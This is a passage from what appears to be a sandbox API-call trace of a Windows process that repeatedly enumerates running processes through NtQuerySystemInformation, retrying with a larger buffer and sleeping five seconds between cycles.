0x0 [0112.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.622] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.637] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.652] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.670] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.685] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.698] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.715] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.733] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.748] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.765] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.777] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.795] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.809] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.825] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.838] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.858] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.872] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.886] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.902] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.919] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.934] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.950] 